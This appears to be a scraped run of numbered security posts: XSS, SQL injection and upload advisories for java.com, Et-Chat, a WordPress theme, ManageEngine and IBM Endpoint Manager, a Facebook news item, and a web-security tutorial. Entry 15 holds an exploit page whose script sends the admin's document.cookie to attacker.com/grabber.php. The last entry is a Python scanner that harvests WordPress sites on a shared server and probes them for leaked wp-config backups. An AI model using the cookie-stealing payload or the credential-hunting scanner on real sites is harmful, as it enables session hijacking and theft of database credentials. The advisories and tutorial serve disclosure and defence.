  14. ###################################################################### # Exploit Title: Java.com RXSS and DOM-XSS # Date: 01/04/2015 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: java.com: Java + You # Version: / # Category: Reflected Cross Site Scripting and DOM based XSS # Google dork: # Tested on: Java.com main domain ###################################################################### Java description : ====================================================================== As of 2015, Java is one of the most popular programming languages in use, particularly for client-server web applications, with a reported 9 million developers. Java was originally developed by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them. Java.com is the main website to acquire Java JRE or JDK software. RXSS Vulnerability description - PoC n°1 : ====================================================================== A reflected XSS is available in the java.com main domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Java portals, or capture Java's users credentials such cookies. It's also possible to forge a fake Java's page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "n" variable and is not properly sanitized before being used to his page. Tested on Firefox 32.0. PoC: https://www.java.com/fr/download/faq/index_general.xml?n=20">2</a><script>alert(/Yann CAM @asafety_www.synetis.com/);</script>?printFriendly=true Screenshots : ====================================================================== - http://www.asafety.fr/data/20141025-java.com_DOMXSS-01.png - http://www.asafety.fr/data/20141025-java.com_DOMXSS-02.png - http://www.asafety.fr/data/20141025-java.com_DOMXSS-03.png - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-01.png - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-02.png Solution: ====================================================================== Fixed by Oracle/Java Security Team. Additional resources : ====================================================================== - http://www.java.com/ - http://www.oracle.com/ - http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html - http://www.asafety.fr/actualites-news/contribution-java-com-dom-xss-reflected-xss - http://www.synetis.com Report timeline : ====================================================================== 2014-10-25 : Oracle/Java Team alerted with details and PoC. 2014-10-27 : Oracle/Java response and confirm vulnerabilities. 2014-12-23 : Vulnerabilities seems to be fixed. 2015-04-01 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr Source: http://packetstorm.wowhacker.com/1504-exploits/javacom-xss.txt
  15. # Exploit Title: Et-Chat 3.0.6 Cross Site Scripting Vulnerability # Google Dork: "ET-Chat v3.0.6" # Date: 2015-03-20 # Exploit Author: IranHack Security Team # Tested on: Windows 7 # Vendor : Www.Et-chat.Ir # Our Website : Www.IranHack.Org *************************************************** Vulnerable code : Location : /etchat/class/admin/AdminRoomsIndex.class.php Code : if (is_array($feld)){ $print_room_list = "<table>"; foreach($feld as $datasets){ if ($datasets[0]!=1) $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td><a href=\"./?AdminDeleteRoom&id=".$datasets[0]."&cs4rue=".$_SESSION['etchat_'.$this->_prefix.'CheckSum4RegUserEdit']."\">".$lang->delete[0]->tagData."</a></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; else $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td style=\"color: #888888;\"><strike>".$lang->delete[0]->tagData."</strike></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; } $print_room_list.= "</table>"; } *************************************************** Description : This vulnerability allows attacker to grab admin cookie and login with admin account The reason of this vulnerability is that values of the room list ( ".$datasets[1]." ) is not filtered and allows attacker to run javascript code. *************************************************** Exploit : 1- Upload this page in a host or Set this code in a html page : <html> <body> <form name="exploit" action="http://target.com/etchat/?AdminCreateNewRoom" method="POST"> <input type="hidden" name="room" value="<script>location.href="http://attacker.com/grabber.php?cookie="+escape(document.cookie)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> 2- Give the uploaded html page address to admin. 3- after opening this page by admin , cookies are logged in Log.txt *************************************************** grabber.php : http://up.iranhack.org/uploads/lquswjwo06vrxz1fe4oo.zip *************************************************** Patch : If u wanna patch this bug , go to file " /etchat/class/admin/AdminRoomsIndex.class.php " Replace this codes : ".$datasets[1]." With this code : ".htmlspecialchars($datasets[1])." *************************************************** Greetz : Mr.XpR , V30Sharp , AL1R3Z4 , Secret.Walker , Irblackhat , FarbodEZRaeL , black-sec , Mr.X2 , @3is , IR4N0nY , , 0x8F , Amirio , 3cure , FTA_Boy , Mr.FixXxer ./Moji.Rider Source
  16. *WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.* v.1.0.* Tested Version: v1.6.2 Advisory Publication: March 10, 2015 Latest Update: March 10, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Vulnerable Versions:* WordPress Daily Edition Theme version 1.6.7 version 1.6.6 version 1.6.5 version 1.6.4 version 1.6.3 version 1.6.2 version 1.6.1 version 1.6 version 1.5 version 1.4.11 version 1.4.10 version 1.4.9 version 1.4.8 version 1.4.7 version 1.4.6 version 1.4.5 version 1.4.4 version 1.4.3 version 1.4.2 version 1.4.1 version 1.4.0 version 1.3.2 version 1.3.1 version 1.3 version 1.2.1 version 1.2 version 1.1.2 version 1.1.1 version 1.1 version 1.0.12 version 1.0.11 version 1.0.10 version 1.0.9 version 1.0.8 version 1.0.7 version 1.0.6 version 1.0.5 version 1.0.4 version 1.0.3 version 1.0.2 version 1.0.1 version 1.0 *Vendor URL & buy:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. *(2.1) *The code programming flaw occurs at "fiche-disque.php?" page with "id" parameters. *References:* http://tetraph.com/security/xss-vulnerability/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-xss.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-xss-cross-site-scripting-security-vulnerabilities/ http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142426561507008&w=2 https://cxsecurity.com/issue/WLB-2015030029 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious Source
  17. ##################################### Title:- Reflected cross-site scripting(XSS) Vulnerability in Manage Engine AD Audit Manager Plus Admin Panel(Build 6270) Author: Harish Ramadoss - Help AG Middle East Vendor: ZOHO Corp Product: Manage Engine AD Audit Manager Plus Version: All versions below Build 6270 are mostly affected Tested Version: Build 6270 Severity: Medium CVE Reference: CVE-2015-1026 # About the Product: ADManager Plus is a Windows Active Directory Management and Reporting Solution that helps AD Administrators and Help Desk Technicians with their day-to-day activities. The software handles a variety of complex tasks like Bulk Management of User accounts and other AD objects, Delegate Role based access to Help Desk Technicians, and generates an exhaustive list of AD Reports, # Description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks. # Vulnerability Class: Reflected cross-site scripting(XSS) - hhttps://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 # How to Reproduce: (POC): 1. “technicianSearchText” parameter is vulnerable to XSS on “Help Desk Technician” page. The page can be found at : AD Delegation -> Help Desk Technician 2. "rolesSearchText" parameter is vulnerable to XSS on “Help Desk Roles” page. The page can be found at : AD Delegation -> Help Desk Roles Proof of Concept code to test XSS : <b onmouseover=alert(document.cookie)>Hover over me!</b> # Disclosure: Discovered: December 08, 2014 Vendor Notification: Jan 22, 2015 Public Disclosure: Mar 10, 2015 # Affected Targets: All versions below Build 6270 are mostly affected. On all platforms (Actually platform doesn't affect the issue). # credits: Harish Ramadoss Information Security Analyst Help AG Middle East #References: [1] help AG middle East http://www.helpag.com/. [2] https://www.manageengine.com/products/ad-manager/ [4] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29(XSS) [5] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. Source
  18. *WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id Parameters SQL Injection Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.2 Tested Version: v1.6.2 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Version:* WordPress Daily Edition Theme v1.6.2 *Vendor URL & Download:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. *(2.1)* The code flaw occurs at "fiche-disque.php?" page with "&id" parameter. *References:* http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/27 http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source *WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src Parameter Unrestricted Upload of File Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.2 Tested Version: v1.6.2 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Version:* WordPress Daily Edition Theme v1.6.2 *Vendor URL & Download:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by "Unrestricted Upload of File" (Arbitrary File Uploading) attacks. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote or local host . This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host. *(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameters. *References:* http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/4 http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source
  19. Do you own a Facebook Business page? If yes, then you will notice a drop in the number of "likes" on your Facebook Page by next week, which could be quite disappointing but, Facebook believes, will help business to know their actual followers. FACEBOOK'S OFFICIAL MASS AUTO-UNLIKE The social network giant is giving its Pages a little spring cleaning, purging them of memorialized and voluntarily deactivated inactive Facebook accounts in an attempt to make its users data more meaningful for businesses and brands. Facebook purge will begin from March 12, Facebook said, and should continue over the next few weeks. FACEBOOK TO DETECT FAKE FOLLOWERS Facebook is also taking steps to improve how it detects fake profiles. We all know that a number of Businesses and Brands buy fake Facebook Likes and Twitter followers in order to show their brand popularity. Social Media giants, Facebook, Twitter and Google, have emerged as major players in recent general elections in India, where political parties spend millions of dollar to buy number of Followers and advertize their promo campaigns to impact Election results. BENEFITS OF REMOVING INACTIVE USERS FROM LIKES According to Facebook, there are two main reasons to remove inactive Facebook accounts from Page audience: Accurate Likes Keeping Actual followers on the Top With more accurate "like" counts, businesses and brands could better understand how much followers are actually interested in their contents and products. Facebook wants to give businesses “up-to-date insights” on their pages’ active followers. The move will give businesses more precise information about those Facebook users who are actively following their Facebook Page and make better use of Facebook’s Custom Audiences tool, which lets businesses create followers — aka lookalike audiences — by finding people on Facebook who are similar to those who already follow the company’s page. The company also wants to make business results consistent with individual users’ experiences. Facebook already filters out "likes and comments generated by deactivated or memorialized accounts from individual Page posts." While, the decrease in number of followers may disappoint you at the very first time, but at the same time it will help you gain a more accurate way to track your customers and grow your followers with authentic number of likes, which will be more beneficial to your business. Source
  20. Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser. Details ======= Product: IBM Endpoint Manager Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48 Fixed Versions: 9.1.1229, 9.2.1.48 Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013 Advisory Status: published CVE: CVE-2014-6137 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137 Introduction ============ IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage) More Details ============ Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information. For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite &version=1 &useCRC=0 The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser: $ curl http://tem-relay.example.com:52311/rd [...] <select NAME="url"> [...] <option>http://"><script>alert(/XSS/)</script></option> </select> Proof of Concept ================ http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion&version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 Fix === Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48. Security Risk ============= As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-09-03 Vendor notified 2015-01-13 Vendor releases security bulletin and software upgrade 2015-02-04 Customer approves public disclosure 2015-02-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source
  21. Introduction In this last part of the Website Hacking series, we are going to list 18 common web vulnerabilities and flaws and we are going to briefly provide solutions to them. Some of them are described for the first time in the Website Hacking series and some we have discussed before but in greater depth. 1. Saving all user input If you are using a framework, for example, a PHP framework, you might be tempted to save all user input to your model or database since it has already been validated and escaped. Let us say that you are using CakePHP and have included a registration form using CakePHP’s Form helper. SNIPPET 1 Now, you might be tempted to save all data from CakePHP’s $this->request->data array/method as is if you do not read the docs carefully or view some of the examples provided there (the live blog site). SNIPPET 2 You just save all data and thank the framework creators. However, there are at least two things you did wrong: $this->request->data does not contain escaped/sanitized input, just the input from the superglobals. Firstly, you should use CakePHP’s h() function to prevent people inserting tags in their username: like this h($this->request->data) However, this is not enough and a wrong approach. If you save all user input in your Model (database) the user can add new input tags directly in his browser and try to guess some columns in your users table for which you have not provided an input in the website’s form. For example, many CakePHP’s applications have “role” column set to user/admin or something similar (it is used in the docs as well). The user can just open his Developer Tools, find the registration form or right click and select Inspect Element, click on Edit as HTML and add a new input like this: <input name=”data[user][role]” type=”text”> <input name=” [user][role]” type=”text”> Or whatever the current way for forms to interact with your Models is, guess column names and insert values to them. One way to solve this is to change your column that defines user’s roles and permissions name to something unpredictable. However, that is not the safest approach you can take. You can either insert the data into the database manually, which will ensure no extra columns will be saved: SNIPPET 3 Or alternatively, you could still save all user data but set explicitly the values of columns not found in the form: SNIPPET 4 2. Allowing user access to assets Many sites work with user input and user data and store this data. Clients can see where their assets are stored, so there is no need for them to guess. For example, a client could see that the images he uploaded were stored in /uploads/{username} because the images he uploaded were loaded to the page from that directory, so if he knows some usernames of different people he could just change the directory name to another user and browse through all of his data without having to brute-force directory names. The first way to tackle this issue that we discussed before is not enough (adding Options All –Indexes to the .htaccess file).It would prevent users from browsing directories and opening whatever they want but they would still know the directory exists and they can still guess directory names because the server will return a 403 Forbidden (which shows something exists in that path). Furthermore, they could guess file names from some patterns that the file names follow and open them. Therefore, you need to block access to the files in your uploads directory. If you are storing text files (let us say users can keep notes and view/edit them whenever they want) you could add to your .htaccess the following rule: RewriteEngine On RewriteRule ^uploads/.*.(txt|doc)$ – [F,L,NC] The F flag would return a 403 Forbidden response, the L flag causes the next rules to stop being processed, and the NC eliminates case-sensitivity. Figure 1: The page with only directory listing disabled. Figure 2: The page with only directory listing disabled. You cannot browse directories, but if each user has a notes.txt file, you can easily view user’s notes by knowing only their username. Figure 3: Trying to access the notes with both directory listing and controlled access to files. If you use the rewrite rule to disable users from browsing other users notes, your back-end would still be able to access the notes, show them to users or edit them. For example: SNIPPET 5 Where the $user variable would come from a session in a real-world application. 3. Running basic WordPress installation Common mistakes here are not limiting the login attempts on your wp-admin page. This would allow anyone to brute-force your credentials and destroy your blog/site. This becomes even easier because most people create their master username to be ‘admin’ which involves only brute-forcing the password to get full access to the WP website. Another mistake is that the wp-admin login page is left without a form of CAPTCHA or a protection against bots. This combined with no limitation of login attempts equals certain death of your online presence at some point in the future. You could avoid all 3 of these things and also change the default wp-admin path to be something different as well (obfuscation). 4. Relying too much on IP addresses while having weak bot protection Most ISPs provide dynamic IP addresses, and the IP address you have banned or stored may already be obsolete in less than a day. Furthermore, it is often not very difficult to change your IP address – use a proxy, release it from the router or from the OS, change locations. There are myriad ways to do it. To prevent bots from causing undesired consequences, it would be better to use alternative ways – enhance your CAPTCHAs, add inputs only bots will fill out, require JavaScript/cookies enabled to submit a form, and so on. 5. Improper redirects Let us say that you have a redirect page or a GET value (for simplicity’s sake) that redirects users to another page of your site or to another website. However, if you forget to disallow redirects to third-party websites or in case you allow those, if you do not create a warning page before redirecting that will tell the user where they are going and that they are leaving the site – users can easily abuse your site by giving links that seem to be pointing to your site but will redirect users to malicious websites. if (isset($_GET['redirect'])) { header("Location: " . $_GET['redirect']); } If we have something as simple as this, then users can easily get fooled to enter bad sites by following an URL like this: http://localhost:8079/articles/Website%20Hacking%20Part%20VII/?redirect=http://www.somemalicioussitehere.com 6. Cross Site Request Forgery If your site allows users to add comments/posts and insert tags such as <img> and load a third-party image, they can provide a link that is not an image but will fool the clients’ browsers (the users that will be reading them) to load the resource and perform an action on a website if they are authenticated in it. For example, if Facebook was sufficed with a couple of GET parameters or a particular URL to follow someone/something on their network, we could have added an image like that: my image And if the user is currently logged in he would have followed an arbitrary person. Of course, this would not work in this particular situation. 7. Insecure file handling A common mistake is to trust that a file does not contain something inappropriate. Code can be disguised as an image, so checking the file extension is not enough. At the very least, the MIME type should also be checked. Also, ASCII / text files should be escaped. Here is an example of such a vulnerability: SNIPPET 6 The vulnerability arises when at some point we display the contents of the .txt file in our page: SNIPPET 7 If the file we submit contains the following code: <script> alert(document.cookie); </script> Then all user cookies for that website will be shown in an alert. 8. Displaying and trusting HTTP headers These can be modified by users and can be malicious. For example, if you display the client’s User-Agent header, it might be changed to consist of code which would then be executed in your back-end. This is also valid for the referrer header, so it should not be used to determine whether the user can access a particular page by itself (for example, checking if the referfer is the login page and assuming the user has logged in successfully since he was redirected to the members area’s index page from the login page). 9. Information disclosure Your live apps should not be in debug mode. Errors should not be shown. 10. Directory traversal If you are using some parameter that opens different files on your website based on user input, your back-end should escape special characters such as the . (dot) or / (slash) from the input and preferably use whitelisting. 11. Using HTTP for semi-confidential data A common flaw is using HTTP for sites that include mechanisms such as registration/login. Even widely used online marketplaces in Bulgaria use simple HTTP (such as OLX.bg - ???? ?? ????????? ????? ). Using HTTP makes it easy for potential attackers in your network to sniff your traffic and get your credentials with no real efforts. For example, if you login to olx while in a Wi-Fi, you are subject to risk. 13. Sessions can be stolen Sessions can be stolen, making the attacker login as someone else. There are multiple vectors of defense here – such as checking the IP address, the user agent, and regenerating session, and adding cookies. 14. Be careful which third-party libraries, CDNs and plugins you use They might be simply outdated, opening a wide variety of security holes, or they might be malicious – giving access to the shady library’s creator to your server. 15. Bots are everywhere Take care of malicious bots not by banning their IP but by enhancing CAPTCHA, adding hidden form fields that users would not fill, and requiring JavaScript or cookies enabled to submit a form. 16. Use HTTP only cookies This would reduce the impact of some other attacks – such as XSS 17. Hashing Hash your passwords and try to avoid md5 or sha-1 algorithms (https://community.qualys.com/blogs/securitylabs/2014/09/09/sha1-deprecation-what-you-need-to-know, hash - Why does some popular software still use md5? - Information Security Stack Exchange ). Use salts to prevent attacks with rainbow tables. 18. XSS Always escape input unless you really, really trust the source (admin panel). You can either remove tags or display them as entities depending on your needs. | PHP: strip_tags($input, $allowedTags); htmlspecialchars($input, ENT_QUOTES); htmlentities($input); | 19. SQL Injection Use prepared statements or do not perform a query which is not hardcoded without sanitizing it (PHP: PDO class or sanitize with mysqli_real_escape_string($conn, $str) if using mysqli. Do not use mysql_*). Conclusion This was the last part of the Website Hacking series. We have introduced some new vulnerabilities and briefly discussed them and have summarized our points for everything that we have talked about so far. We hope that now you will feel more confident when deploying your web apps by putting these strategies in use. Source
  22. import re , urllib2 , sys, urllib lista = [] backup = ['wp-config.php~','wp-config.php.bak','wp-config.bak','wp-config.php-bak','/wp-content/uploads/blog-backup.txt'] def unique(seq): seen = set() return [seen.add(x) or x for x in seq if x not in seen] def grabwp(ip): try: s = ip page = 1 print('\n') while page <= 21: bing = "http://www.bing.com/search?q=ip%3A"+s+"+?page_id=&count=50&first="+str(page) openbing = urllib2.urlopen(bing) readbing = openbing.read() findwebs = re.findall('<h2><a href="(.*?)"' , readbing) for i in range(len(findwebs)): wpnoclean = findwebs[i] findwp = re.findall('(.*?)\?page_id=', wpnoclean) lista.extend(findwp) page = page + 10 except IndexError: pass def searchbackup(site, config): try : read = urllib2.urlopen(site + "/" + config).read() rs = re.findall("USER",read) if rs : print "BACKUP FILE > " + site + "/" + config except : pass def scan(): final = unique(lista) for site in final : for config in backup : searchbackup(site, config) print "\!/ Server Wordpress Backup Files Scanner By YASSINOX.TN !/" print '' ip = raw_input("Server Ip Adress : ") grabwp(ip) final = unique(lista) print "Done ! Grabbed " + str(len(final) ) + " Wordpress Sites On This Server" print "---------------------------------------------------" scan() print "---------------------------------------------------"
